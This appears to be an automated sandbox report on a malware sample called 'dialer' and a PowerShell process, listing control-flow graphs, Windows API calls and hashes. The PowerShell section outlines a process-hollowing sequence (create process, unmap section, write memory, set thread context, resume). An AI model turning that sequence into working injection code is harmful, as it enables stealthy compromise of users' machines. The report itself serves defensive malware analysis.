Memory Dump Source
• Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
Similarity
• API ID: wcslen$memset$wcscatwcscpywcsncmp
• String ID: 0$X$\BaseNamedObjects\gohkfyvqbpmecnid$`
• API String ID: 780471329-2131913626
• Opcode ID: 1797c675c7d499b762c492f57bc66f0dd952a150cabb47eb5dc0e9800f8e4f22
• Instruction ID: 956054282284ba03289f89f3cc30737ba7bc10dd6e0d7d1cce8e88f75dff8f4e
• Opcode Fuzzy Hash: 1797c675c7d499b762c492f57bc66f0dd952a150cabb47eb5dc0e9800f8e4f22
• Instruction Fuzzy Hash: 76126AB2618BC081E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 7fd7b0665d0d478afd4b778b9ad3b37bf3618c53fbd75c2eb7eefae68cdd4a41
                                                                  • Instruction ID: 2cf36224565f858ee5398084e6954f654d065b2d5c5980acf610c9099daef405
                                                                  • Opcode Fuzzy Hash: 7fd7b0665d0d478afd4b778b9ad3b37bf3618c53fbd75c2eb7eefae68cdd4a41
                                                                  • Instruction Fuzzy Hash: 3F5121F1601A4085FB16EF27F9943EA27A1BB8CBD0F449121FB4E873B2DE3884958700

                                                                  Control-flow Graph

                                                                  control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 509 140001cf4-140001cfe call 140001d40 503->509 510 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->510 504->505 507 140001c04 504->507 505->502 505->503 511 140001cd7-140001cf3 memcpy 507->511 514 140001d03-140001d1e call 140001d40 509->514 510->514 517 140001c72-140001c79 510->517 518 140001d23-140001d38 GetLastError call 140001d40 514->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->511 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DF8,0000000140007DF8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DF8,0000000140007DF8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                  • memcpy.MSVCRT ref: 0000000140001CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,0000000140007DF8,0000000140007DF8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: b6585465a2f05c01175db11acf9f7dc49478311fb90e361966a65ca9776a65ce
                                                                  • Instruction ID: cdb230e1ef6f7a2394f5e18ac8b6d032a855755febd0cb1b64a996fcc1728738
                                                                  • Opcode Fuzzy Hash: b6585465a2f05c01175db11acf9f7dc49478311fb90e361966a65ca9776a65ce
                                                                  • Instruction Fuzzy Hash: 494132B1201A4486FA66DF97F884BE927A0F78DBC4F554526EF0E877B1DA38C586C700

                                                                  Control-flow Graph

                                                                  control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: af4863ad55e9be3948dd3f8b92581dcfb2da1e9ba0e5ff862a0098994ca326ab
                                                                  • Instruction ID: fe4873fd32a2debdddda51fa9ba6133c569768c8fc11484b8c125a382026d3df
                                                                  • Opcode Fuzzy Hash: af4863ad55e9be3948dd3f8b92581dcfb2da1e9ba0e5ff862a0098994ca326ab
                                                                  • Instruction Fuzzy Hash: B321E3B0705A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A576B4DB798986C300

                                                                  Control-flow Graph

                                                                  control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006bd0 553->557 561 140001f43-140001f45 554->561 562 140001f2f-140001f3f 554->562 555->554 559 140001ee4-140001ee8 555->559 556->548 558 140001ec0 556->558 557->554 566 140001f0c-140001f10 557->566 558->554 563 140001eea-140001ef9 signal 559->563 564 140001f4e-140001f53 559->564 561->548 562->561 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                                                  • Instruction ID: 32d80918a5fc0d3f209f19ed34055b18f0ef7c89e2b1fcaed64eceb18b648f5f
                                                                  • Opcode Fuzzy Hash: 5ae0183bb3e8df43bf7b800ab47aff4b5323fb398a3dc02e0685aa06d0cc4238
                                                                  • Instruction Fuzzy Hash: D22139B1A0161542FA77DA2BB5903FA2192ABCC7E4F258535BF19873F5DF3888C28241

                                                                  Control-flow Graph

                                                                  control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 584 140001a20-140001a26 580->584 585 140001956-140001961 581->585 586 14000199e-1400019a6 581->586 582->581 583 14000192b-14000193a 582->583 583->579 589 140001b87-140001b98 call 140001d40 584->589 590 140001a2c-140001a37 584->590 587 140001970-14000199c call 140001ba0 585->587 586->572 588 1400019a8-1400019c1 586->588 587->586 594 1400019df-1400019e7 588->594 590->586 591 140001a3d-140001a5f 590->591 597 140001a7d-140001a97 591->597 595 1400019e9-140001a0d VirtualProtect 594->595 596 1400019d0-1400019dd 594->596 595->596 596->572 596->594 600 140001b74-140001b82 call 140001d40 597->600 601 140001a9d-140001afa 597->601 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->597 613->609 614->600
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: 33ff9c26ba1a50189676bcdea232609c43de2a965b763305e03269797e3983e4
                                                                  • Instruction ID: d95b69f808bbd9c9542974b089c040f35f1bf1f56e437b3fcff01fca96367475
                                                                  • Opcode Fuzzy Hash: 33ff9c26ba1a50189676bcdea232609c43de2a965b763305e03269797e3983e4
                                                                  • Instruction Fuzzy Hash: BB5105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                                  Control-flow Graph

                                                                  control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                                                  • Instruction ID: c63db515c4fb09d3b511a87353661d5ddb22af0fe9f44d3f7c4a04084b72718c
                                                                  • Opcode Fuzzy Hash: 7ca9402c377c7502ec41e05436912aeebb55393020027df2fd4a95d8ace9b475
                                                                  • Instruction Fuzzy Hash: 40F0F671A04A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C300

                                                                  Control-flow Graph

                                                                  control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000040.00000002.2936348681.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000040.00000002.2936284891.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936432899.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936512648.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000040.00000002.2936630716.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0
                                                                  • Opcode ID: 359475ec8b7528c77e115259b106b0472551a1d365d7dff617278925673e248b
                                                                  • Instruction ID: e122d931978df067e2f6f523752654566603ac09ede92c32e374204b0c7f82cb
                                                                  • Opcode Fuzzy Hash: 359475ec8b7528c77e115259b106b0472551a1d365d7dff617278925673e248b
                                                                  • Instruction Fuzzy Hash: 3F01B2B5705A0192FA6BDB53FE083D86364BB6CBD1F454021EF0953AB4DB79C996C300

                                                                  Execution Graph

                                                                  Execution Coverage: 56.2%
                                                                  Dynamic/Decrypted Code Coverage: 0%
                                                                  Signature Coverage: 87.5%
                                                                  Total number of Nodes: 8
                                                                  Total number of Limit Nodes: 1

                                                                  Callgraph

                                                                  callgraph 0 Function_0000000140832CF2 1 Function_0000000140832F61 2 Function_0000000140832D30 2->0 2->1 3 Function_0000000140832CB0 3->2

                                                                  Control-flow Graph

                                                                  control_flow_graph 0 140832d30-140832d33 1 140832d3d-140832d41 0->1 2 140832d43-140832d4b 1->2 3 140832d4d 1->3 2->3 4 140832d35-140832d3a 3->4 5 140832d4f-140832d52 3->5 4->1 6 140832d5b-140832d62 5->6 8 140832d64-140832d6c 6->8 9 140832d6e 6->9 8->9 10 140832d54-140832d59 9->10 11 140832d70-140832d73 9->11 10->6 12 140832d75-140832d83 11->12 13 140832d8e-140832d90 11->13 15 140832d85-140832d8a 12->15 16 140832ddd-140832dfc 12->16 17 140832d92-140832d98 13->17 18 140832d9a 13->18 20 140832dc4-140832dc7 15->20 22 140832d8c 15->22 19 140832e2d-140832e30 16->19 17->18 18->20 21 140832d9c-140832da0 18->21 25 140832e32-140832e33 19->25 26 140832e35-140832e3b 19->26 33 140832dc9-140832dd8 call 140832cf2 20->33 23 140832da2-140832da8 21->23 24 140832daa 21->24 22->21 23->24 24->20 27 140832dac-140832db3 24->27 28 140832e14-140832e18 25->28 30 140832e42-140832e46 26->30 44 140832db5-140832dbb 27->44 45 140832dbd 27->45 31 140832e1a-140832e1d 28->31 32 140832dfe-140832e01 28->32 34 140832e48-140832e60 LoadLibraryA 30->34 35 140832e9e-140832ea6 30->35 31->26 39 140832e1f-140832e23 31->39 32->26 36 140832e03 32->36 33->1 41 140832e62-140832e69 34->41 38 140832eaa-140832eb3 35->38 43 140832e04-140832e08 36->43 46 140832ee2-140832f42 VirtualProtect * 2 call 140832f61 38->46 47 140832eb5-140832eb7 38->47 39->43 48 140832e25-140832e2c 39->48 41->30 42 140832e6b 41->42 50 140832e77-140832e7f 42->50 51 140832e6d-140832e75 42->51 43->28 52 140832e0a-140832e0c 43->52 44->45 45->27 53 140832dbf-140832dc2 45->53 60 140832f47-140832f4c 46->60 54 140832eca-140832ed8 47->54 55 140832eb9-140832ec8 47->55 48->19 57 140832e81-140832e8d GetProcAddressForCaller 50->57 51->57 52->28 58 140832e0e-140832e12 52->58 53->33 54->55 59 140832eda-140832ee0 54->59 55->38 61 140832e98 ExitProcess 57->61 62 140832e8f-140832e96 57->62 58->28 58->31 59->55 63 140832f51-140832f56 60->63 62->41 63->63 64 140832f58 63->64
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000041.00000002.2936453016.000000014082C000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000041.00000002.2936323754.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000041.00000002.2936453016.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000041.00000002.2936453016.00000001404C8000.00000040.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000041.00000002.2936453016.00000001404EC000.00000040.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000041.00000002.2936453016.00000001404EF000.00000040.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000041.00000002.2936453016.0000000140777000.00000040.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000041.00000002.2936453016.00000001407F8000.00000040.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000041.00000002.2938364013.0000000140834000.00000004.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1941872368-0
                                                                  • Opcode ID: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                                  • Instruction ID: 490267afce550785c801030b00c3b8e77ffef9829ef37814adfd0db67bac2f23
                                                                  • Opcode Fuzzy Hash: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                                  • Instruction Fuzzy Hash: 97614832F4025745FB275BAAEB853E86350A39D7B4F084721CBB9433F6E67A88568310

                                                                  Execution Graph

                                                                  Execution Coverage: 6.9%
                                                                  Dynamic/Decrypted Code Coverage: 0%
                                                                  Signature Coverage: 0%
                                                                  Total number of Nodes: 27
                                                                  Total number of Limit Nodes: 0

                                                                  Control-flow Graph

                                                                  control_flow_graph 207 7ffd9b8b0c7d-7ffd9b8b0c89 208 7ffd9b8b0c8b-7ffd9b8b0c93 207->208 209 7ffd9b8b0c94-7ffd9b8b0d08 207->209 208->209 213 7ffd9b8b0d0a-7ffd9b8b0d0f 209->213 214 7ffd9b8b0d12-7ffd9b8b0d55 NtWriteVirtualMemory 209->214 213->214 215 7ffd9b8b0d57 214->215 216 7ffd9b8b0d5d-7ffd9b8b0d7a 214->216 215->216
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryVirtualWrite
                                                                  • String ID:
                                                                  • API String ID: 3527976591-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; a single basic block]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls NtUnmapViewOfSection]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; a single basic block]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls NtResumeThread]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls NtUnmapViewOfSection]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: SectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 498011366-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls NtSetContextThread]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThread
                                                                  • String ID:
                                                                  • API String ID: 1591575202-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls CreateProcessA and an internal subroutine]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls CreateFileMappingW and an internal subroutine]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileMapping
                                                                  • String ID:
                                                                  • API String ID: 524692379-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls CreateFileA and an internal subroutine]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls MapViewOfFile]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: FileView
                                                                  • String ID:
                                                                  • API String ID: 3314676101-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; the function calls K32GetModuleInformation]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: InformationModule
                                                                  • String ID:
                                                                  • API String ID: 3425974696-0

                                                                  Control-flow Graph

                                                                  [graph image omitted; executed and not-executed blocks; a large function with no resolved API calls]
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1992022694.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1998396044.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h&_H
                                                                  • API String ID: 0-2788340379
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1998396044.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h&_H
                                                                  • API String ID: 0-2788340379
                                                                  • Opcode ID: 9ce492da2cf30d56f0693e2020e26c30911d2edc997fb9b74a4002bd05a092b0
                                                                  • Instruction ID: 2f88a1ae5230e2c86f08ae8b7ccf5ada54a521f1744603e5db72a37d626ec165
                                                                  • Opcode Fuzzy Hash: 9ce492da2cf30d56f0693e2020e26c30911d2edc997fb9b74a4002bd05a092b0
                                                                  • Instruction Fuzzy Hash: 8AF05923F0E9DD0BEBA591AC34255F526C1EFA5620B4901B6D51CC72C6DC049C1503C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1992022694.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
